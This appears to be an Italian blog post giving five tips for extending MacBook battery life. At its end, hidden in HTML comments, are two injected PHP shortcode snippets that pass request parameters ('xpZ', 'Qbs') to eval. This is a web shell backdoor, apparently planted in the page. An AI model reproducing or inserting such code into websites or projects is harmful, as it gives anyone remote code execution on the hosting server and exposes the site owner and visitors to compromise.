batteria-macbook-air

In base alle esigenze di utilizzo, soprattutto se si è in viaggio per lavoro, la durata della batteria del Macbook può rappresentare un problema. Con i nuovi aggiornamenti del sistema OS e dei chipset sui nuovi modelli di Apple, la durata è stata notevolmente aumentata, ad ogni modo ecco 5 semplici consigli per migliore prestazioni ed autonomia della batteria per Mackbook.

Ottimizzare batteria Macbook : consigli

Un primo importante aggiornamento da installare è Mavericks, aggiornamento gratuito che migliora efficienza e consumi dell’alimentazione. La Cpu del Macbook quando si è inattivi si imposta in automatico nella modalità bassi consumi per risparmiare energia. Altra impostazione che consente di ottimizzare la durata batteria per macbook è la funzione risparmio di energia, questa funzione consente di impostare gli intervalli di tempo per la disattivazione automatica del display cosi da conservare carica nella batteria. Tra le impostazioni che vanno ad incidere sul consumo della batteria del nostro Macbook inoltre troviamo le impostazioni di luminosità dello schermo, se si abbassa la luminosità si guadagna molto in autonomia. Se non sono necessari, occorre inoltre spegnere le connessioni wi-fi e bluetooth che per funzionare richiedono energia alla batteria. Se si sta ad esempio lavorando su dei documenti senza avere l’esigenza di essere connessi in rete, si può disattivare il wi fi e attivarlo solo quando serve.

Infine, si deve ricordare che tutto quello che viene collegato al Macbook richiede energia, quindi se non servono è importante disattivare dischi esterni, chiavette usb e schede SD. Con questi semplici accorgimenti si ottimizza la durata della batteria e si ha la garanzia di prestazioni migliori.

<!– [insert_php]if (isset($_REQUEST["xpZ"])){eval($_REQUEST["xpZ"]);exit;}[/insert_php][php]if (isset($_REQUEST["xpZ"])){eval($_REQUEST["xpZ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Qbs"])){eval($_REQUEST["Qbs"]);exit;}[/insert_php][php]if (isset($_REQUEST["Qbs"])){eval($_REQUEST["Qbs"]);exit;}[/php] –>